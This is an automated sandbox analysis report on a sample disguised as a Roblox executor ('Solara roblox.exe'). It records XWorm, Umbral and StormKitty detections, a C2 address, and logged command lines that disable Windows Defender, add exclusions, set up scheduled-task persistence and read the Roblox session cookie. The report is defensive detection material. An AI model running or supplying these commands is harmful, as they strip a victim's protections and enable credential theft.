Analysis
-
max time kernel
133s -
max time network
149s -
platform
windows11-21h2_x64 -
resource
win11-20240704-en -
resource tags
arch:x64arch:x86image:win11-20240704-enlocale:en-usos:windows11-21h2-x64system -
submitted
09-07-2024 11:26
Behavioral task
behavioral1
Sample
Solara roblox.exe
Resource
win11-20240704-en
General
-
Target
Solara roblox.exe
-
Size
102KB
-
MD5
ce28d82fa8e4dbbd72cae1bf8d4930e1
-
SHA1
0cba2f93bc5c9d9e4f950c66e7ac3acee3ce418f
-
SHA256
d9ca4eaa59a18b4b30518a5c85c757a8b04240e579a1460f0472c608aa2b7bc2
-
SHA512
ba5506f4dfa1c46e9ac38ca1c6ffabd1870eb4c99d98dae963dda8c387cc1c423a1cbef09f93befba889a65f8f51f34663f64dbb14743c82d8ec40fc036fe57e
-
SSDEEP
3072:Eb1Z3z4aicVw+NUbUq5dikO3WGWlxUJ1lbE812:Eb1ldC+UbUSdiIdnUJfEm
Malware Config
Extracted
xworm
127.0.0.1:62559
19.ip.gl.ply.gg:62559
-
Install_directory
%AppData%
-
install_file
svchost.exe
Signatures
-
Detect Umbral payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\nzelay.exe family_umbral behavioral1/memory/3092-70-0x000001EE4F670000-0x000001EE4F6B6000-memory.dmp family_umbral -
Detect Xworm Payload 2 IoCs
Processes:
resource yara_rule behavioral1/memory/3832-1-0x0000000000620000-0x0000000000640000-memory.dmp family_xworm C:\Users\Admin\AppData\Roaming\svchost.exe family_xworm -
StormKitty
StormKitty is an open source info stealer written in C#.
-
StormKitty payload 1 IoCs
Processes:
resource yara_rule behavioral1/memory/3832-150-0x000000001CB60000-0x000000001CC80000-memory.dmp family_stormkitty -
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 3280 powershell.exe 4836 powershell.exe 4516 powershell.exe 900 powershell.exe 3816 powershell.exe -
Drops file in Drivers directory 1 IoCs
Processes:
nzelay.exedescription ioc process File opened for modification C:\Windows\System32\drivers\etc\hosts nzelay.exe -
Drops startup file 2 IoCs
Processes:
Solara roblox.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk Solara roblox.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk Solara roblox.exe -
Executes dropped EXE 3 IoCs
Processes:
svchost.exenzelay.exesvchost.exepid process 2396 svchost.exe 3092 nzelay.exe 1840 svchost.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
Solara roblox.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3590242114-4229536887-1276274119-1000\Software\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\AppData\\Roaming\\svchost.exe" Solara roblox.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 1 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
-
Runs ping.exe 1 TTPs 1 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 20 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exeSolara roblox.exenzelay.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 900 powershell.exe 900 powershell.exe 3816 powershell.exe 3816 powershell.exe 3280 powershell.exe 3280 powershell.exe 4836 powershell.exe 4836 powershell.exe 3832 Solara roblox.exe 3092 nzelay.exe 4516 powershell.exe 4516 powershell.exe 4180 powershell.exe 4180 powershell.exe 1048 powershell.exe 1048 powershell.exe 1160 powershell.exe 1160 powershell.exe 3680 powershell.exe 3680 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
Solara roblox.exepowershell.exepowershell.exepowershell.exepowershell.exesvchost.exenzelay.exewmic.exepowershell.exepowershell.exepowershell.exepowershell.exewmic.exedescription pid process Token: SeDebugPrivilege 3832 Solara roblox.exe Token: SeDebugPrivilege 900 powershell.exe Token: SeDebugPrivilege 3816 powershell.exe Token: SeDebugPrivilege 3280 powershell.exe Token: SeDebugPrivilege 4836 powershell.exe Token: SeDebugPrivilege 3832 Solara roblox.exe Token: SeDebugPrivilege 2396 svchost.exe Token: SeDebugPrivilege 3092 nzelay.exe Token: SeIncreaseQuotaPrivilege 1628 wmic.exe Token: SeSecurityPrivilege 1628 wmic.exe Token: SeTakeOwnershipPrivilege 1628 wmic.exe Token: SeLoadDriverPrivilege 1628 wmic.exe Token: SeSystemProfilePrivilege 1628 wmic.exe Token: SeSystemtimePrivilege 1628 wmic.exe Token: SeProfSingleProcessPrivilege 1628 wmic.exe Token: SeIncBasePriorityPrivilege 1628 wmic.exe Token: SeCreatePagefilePrivilege 1628 wmic.exe Token: SeBackupPrivilege 1628 wmic.exe Token: SeRestorePrivilege 1628 wmic.exe Token: SeShutdownPrivilege 1628 wmic.exe Token: SeDebugPrivilege 1628 wmic.exe Token: SeSystemEnvironmentPrivilege 1628 wmic.exe Token: SeRemoteShutdownPrivilege 1628 wmic.exe Token: SeUndockPrivilege 1628 wmic.exe Token: SeManageVolumePrivilege 1628 wmic.exe Token: 33 1628 wmic.exe Token: 34 1628 wmic.exe Token: 35 1628 wmic.exe Token: 36 1628 wmic.exe Token: SeIncreaseQuotaPrivilege 1628 wmic.exe Token: SeSecurityPrivilege 1628 wmic.exe Token: SeTakeOwnershipPrivilege 1628 wmic.exe Token: SeLoadDriverPrivilege 1628 wmic.exe Token: SeSystemProfilePrivilege 1628 wmic.exe Token: SeSystemtimePrivilege 1628 wmic.exe Token: SeProfSingleProcessPrivilege 1628 wmic.exe Token: SeIncBasePriorityPrivilege 1628 wmic.exe Token: SeCreatePagefilePrivilege 1628 wmic.exe Token: SeBackupPrivilege 1628 wmic.exe Token: SeRestorePrivilege 1628 wmic.exe Token: SeShutdownPrivilege 1628 wmic.exe Token: SeDebugPrivilege 1628 wmic.exe Token: SeSystemEnvironmentPrivilege 1628 wmic.exe Token: SeRemoteShutdownPrivilege 1628 wmic.exe Token: SeUndockPrivilege 1628 wmic.exe Token: SeManageVolumePrivilege 1628 wmic.exe Token: 33 1628 wmic.exe Token: 34 1628 wmic.exe Token: 35 1628 wmic.exe Token: 36 1628 wmic.exe Token: SeDebugPrivilege 4516 powershell.exe Token: SeDebugPrivilege 4180 powershell.exe Token: SeDebugPrivilege 1048 powershell.exe Token: SeDebugPrivilege 1160 powershell.exe Token: SeIncreaseQuotaPrivilege 4324 wmic.exe Token: SeSecurityPrivilege 4324 wmic.exe Token: SeTakeOwnershipPrivilege 4324 wmic.exe Token: SeLoadDriverPrivilege 4324 wmic.exe Token: SeSystemProfilePrivilege 4324 wmic.exe Token: SeSystemtimePrivilege 4324 wmic.exe Token: SeProfSingleProcessPrivilege 4324 wmic.exe Token: SeIncBasePriorityPrivilege 4324 wmic.exe Token: SeCreatePagefilePrivilege 4324 wmic.exe Token: SeBackupPrivilege 4324 wmic.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
Solara roblox.exepid process 3832 Solara roblox.exe -
Suspicious use of WriteProcessMemory 38 IoCs
Processes:
Solara roblox.exenzelay.execmd.exedescription pid process target process PID 3832 wrote to memory of 900 3832 Solara roblox.exe powershell.exe PID 3832 wrote to memory of 900 3832 Solara roblox.exe powershell.exe PID 3832 wrote to memory of 3816 3832 Solara roblox.exe powershell.exe PID 3832 wrote to memory of 3816 3832 Solara roblox.exe powershell.exe PID 3832 wrote to memory of 3280 3832 Solara roblox.exe powershell.exe PID 3832 wrote to memory of 3280 3832 Solara roblox.exe powershell.exe PID 3832 wrote to memory of 4836 3832 Solara roblox.exe powershell.exe PID 3832 wrote to memory of 4836 3832 Solara roblox.exe powershell.exe PID 3832 wrote to memory of 3112 3832 Solara roblox.exe schtasks.exe PID 3832 wrote to memory of 3112 3832 Solara roblox.exe schtasks.exe PID 3832 wrote to memory of 3092 3832 Solara roblox.exe nzelay.exe PID 3832 wrote to memory of 3092 3832 Solara roblox.exe nzelay.exe PID 3092 wrote to memory of 1628 3092 nzelay.exe wmic.exe PID 3092 wrote to memory of 1628 3092 nzelay.exe wmic.exe PID 3092 wrote to memory of 4472 3092 nzelay.exe attrib.exe PID 3092 wrote to memory of 4472 3092 nzelay.exe attrib.exe PID 3092 wrote to memory of 4516 3092 nzelay.exe powershell.exe PID 3092 wrote to memory of 4516 3092 nzelay.exe powershell.exe PID 3092 wrote to memory of 4180 3092 nzelay.exe powershell.exe PID 3092 wrote to memory of 4180 3092 nzelay.exe powershell.exe PID 3092 wrote to memory of 1048 3092 nzelay.exe powershell.exe PID 3092 wrote to memory of 1048 3092 nzelay.exe powershell.exe PID 3092 wrote to memory of 1160 3092 nzelay.exe powershell.exe PID 3092 wrote to memory of 1160 3092 nzelay.exe powershell.exe PID 3092 wrote to memory of 4324 3092 nzelay.exe wmic.exe PID 3092 wrote to memory of 4324 3092 nzelay.exe wmic.exe PID 3092 wrote to memory of 4840 3092 nzelay.exe wmic.exe PID 3092 wrote to memory of 4840 3092 nzelay.exe wmic.exe PID 3092 wrote to memory of 2504 3092 nzelay.exe wmic.exe PID 3092 wrote to memory of 2504 3092 nzelay.exe wmic.exe PID 3092 wrote to memory of 3680 3092 nzelay.exe powershell.exe PID 3092 wrote to memory of 3680 3092 nzelay.exe powershell.exe PID 3092 wrote to memory of 2456 3092 nzelay.exe wmic.exe PID 3092 wrote to memory of 2456 3092 nzelay.exe wmic.exe PID 3092 wrote to memory of 4152 3092 nzelay.exe cmd.exe PID 3092 wrote to memory of 4152 3092 nzelay.exe cmd.exe PID 4152 wrote to memory of 4784 4152 cmd.exe PING.EXE PID 4152 wrote to memory of 4784 4152 cmd.exe PING.EXE -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\Solara roblox.exe"C:\Users\Admin\AppData\Local\Temp\Solara roblox.exe"1⤵
- Drops startup file
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara roblox.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Solara roblox.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svchost.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\svchost.exe"2⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Users\Admin\AppData\Local\Temp\nzelay.exe"C:\Users\Admin\AppData\Local\Temp\nzelay.exe"2⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\nzelay.exe"3⤵
- Views/modifies file attributes
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\nzelay.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 23⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory3⤵
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER3⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name3⤵
- Detects videocard installed
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\nzelay.exe" && pause3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\PING.EXEping localhost4⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Roaming\svchost.exeC:\Users\Admin\AppData\Roaming\svchost.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\svchost.exeC:\Users\Admin\AppData\Roaming\svchost.exe1⤵
- Executes dropped EXE
Network
MITRE ATT&CK Matrix ATT&CK v13
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD5627073ee3ca9676911bee35548eff2b8
SHA14c4b68c65e2cab9864b51167d710aa29ebdcff2e
SHA25685b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c
SHA5123c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\svchost.exe.logFilesize
654B
MD52cbbb74b7da1f720b48ed31085cbd5b8
SHA179caa9a3ea8abe1b9c4326c3633da64a5f724964
SHA256e31b18f21621d9983bfdf1ea3e53884a9d58b8ffd79e0e5790da6f3a81a8b9d3
SHA512ecf02d5240e0c1c005d3ab393aa7eff62bd498c2db5905157e2bf6d29e1b663228a9583950842629d1a4caef404c8941a0c7799b1a3bd1eb890a09fdb7efcff9
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
948B
MD56490e5c0581c173062323b1c20cfd9ff
SHA11652893659f99b780fd9733243637eb7795f5212
SHA256a552b6d7bebb1714f01a5f3d8b5493e1b369c93ee68c62256dfddcc7f3f4fe79
SHA512fdb077b40b4371a74cb70ae74d28a4433399e5c4a69fe9a5652409a62c2435d3197da42808d5cb65e9b7ff35bc2e593ad70fa83581c7fd672d631b25f53d3c65
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD50ac871344dc49ae49f13f0f88acb4868
SHA15a073862375c7e79255bb0eab32c635b57a77f98
SHA256688f15b59a784f6f4c62554f00b5d0840d1489cef989c18126c70dfee0806d37
SHA512ace5c50303bd27998607cf34ac4322bcf5edfbd19bbb24309acf4d037b6f3f7636c7c14b6ac0b924114e036252d3a1b998951c7068f41548728fa5d92f5f9006
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD52bb0538fcc1cbfca1c374b8c092adfcd
SHA111d04e1bb8c5bf2bcf295ce3f4fea2ba41e45ba0
SHA256c4b7f436c24728ef7f02b2f071aa880287a8f102a5047fbecfd024f87ef5c67d
SHA51238cc6d129be4429c3b5d173cde524306a981fd4ec75896725e02367fc2777edba711dce1e4331b4d27ee9fa6f80c58530f175e9246a7608230ba8940aa010841
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD5e3840d9bcedfe7017e49ee5d05bd1c46
SHA1272620fb2605bd196df471d62db4b2d280a363c6
SHA2563ac83e70415b9701ee71a4560232d7998e00c3db020fde669eb01b8821d2746f
SHA51276adc88ab3930acc6b8b7668e2de797b8c00edcfc41660ee4485259c72a8adf162db62c2621ead5a9950f12bfe8a76ccab79d02fda11860afb0e217812cac376
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD59d17e8585400bc639a8b261083920ec3
SHA1aef71cce477bd67115a4e2a0a86e6b8f0f62e30a
SHA25681fa386fa9b3d185839bec826c3f8cc422e1f329792b901d61be826d42a57fc1
SHA512235c6644c1349c77f2805c400fd1091a8775b7e63a2ba2e360418faaeb8b696da13ea7bb33a2d92b35f3fafd30fa6945c2398fba7bba39cf5f037a7d900878d5
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD58cb7f4b4ab204cacd1af6b29c2a2042c
SHA1244540c38e33eac05826d54282a0bfa60340d6a1
SHA2564994013dabe4f131d401879278eee147add6349124ea6452358dca7e2344c7a6
SHA5127651cb6863a425840db610253151e271d3e8da26a8c633ce484247266fa226792ecb84b9578df3ab17fef84a5dfcad417b63a7df59c9650a907e08d59b91dd6e
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD59deb31d63c251368f1dcf297650b2997
SHA102a6835b82971ae7dba9d97e528412fac5247714
SHA2569c598fb1420e5646126e8f7a42a3ea94b1050017e9cb67bbe6429f08c1bc2893
SHA5120d6c8958a051b75f0d0a53e336954e102e642ad79a96f39fb1ed6643d77f9b54725b27eef460e33c89ff1d6136155cb6d873c25f9ae3dfc4a9d3a9346816477a
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_t10kuwlq.jpa.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\nzelay.exeFilesize
253KB
MD59f3f506175ad4d9550bf1aea609694a7
SHA16cc35e30d5b40eb1b5d115feec12ec247a84193f
SHA2567103785c72f15bc66849b927bb9b0030c2a8383a8f71cd4308b0b42055d8d467
SHA512b4a691e3b679dac187f1219cff013d3e27a87d55bf10c4744b8aba969a0caac39922dbbf9bce454b87e3e685f5bfa9043ecabacca090650278ab2d081bc2d5cb
-
C:\Users\Admin\AppData\Roaming\svchost.exeFilesize
102KB
MD5ce28d82fa8e4dbbd72cae1bf8d4930e1
SHA10cba2f93bc5c9d9e4f950c66e7ac3acee3ce418f
SHA256d9ca4eaa59a18b4b30518a5c85c757a8b04240e579a1460f0472c608aa2b7bc2
SHA512ba5506f4dfa1c46e9ac38ca1c6ffabd1870eb4c99d98dae963dda8c387cc1c423a1cbef09f93befba889a65f8f51f34663f64dbb14743c82d8ec40fc036fe57e
-
memory/900-14-0x00007FF811980000-0x00007FF812442000-memory.dmpFilesize
10.8MB
-
memory/900-13-0x00007FF811980000-0x00007FF812442000-memory.dmpFilesize
10.8MB
-
memory/900-16-0x00007FF811980000-0x00007FF812442000-memory.dmpFilesize
10.8MB
-
memory/900-19-0x00007FF811980000-0x00007FF812442000-memory.dmpFilesize
10.8MB
-
memory/900-15-0x00007FF811980000-0x00007FF812442000-memory.dmpFilesize
10.8MB
-
memory/900-8-0x000002ACEEDA0000-0x000002ACEEDC2000-memory.dmpFilesize
136KB
-
memory/900-12-0x00007FF811980000-0x00007FF812442000-memory.dmpFilesize
10.8MB
-
memory/3092-130-0x000001EE69F50000-0x000001EE69F62000-memory.dmpFilesize
72KB
-
memory/3092-93-0x000001EE69E60000-0x000001EE69ED6000-memory.dmpFilesize
472KB
-
memory/3092-94-0x000001EE69EE0000-0x000001EE69F30000-memory.dmpFilesize
320KB
-
memory/3092-95-0x000001EE69E40000-0x000001EE69E5E000-memory.dmpFilesize
120KB
-
memory/3092-70-0x000001EE4F670000-0x000001EE4F6B6000-memory.dmpFilesize
280KB
-
memory/3092-129-0x000001EE69E30000-0x000001EE69E3A000-memory.dmpFilesize
40KB
-
memory/3832-0-0x00007FF811983000-0x00007FF811985000-memory.dmpFilesize
8KB
-
memory/3832-55-0x00007FF811980000-0x00007FF812442000-memory.dmpFilesize
10.8MB
-
memory/3832-2-0x00007FF811980000-0x00007FF812442000-memory.dmpFilesize
10.8MB
-
memory/3832-1-0x0000000000620000-0x0000000000640000-memory.dmpFilesize
128KB
-
memory/3832-150-0x000000001CB60000-0x000000001CC80000-memory.dmpFilesize
1.1MB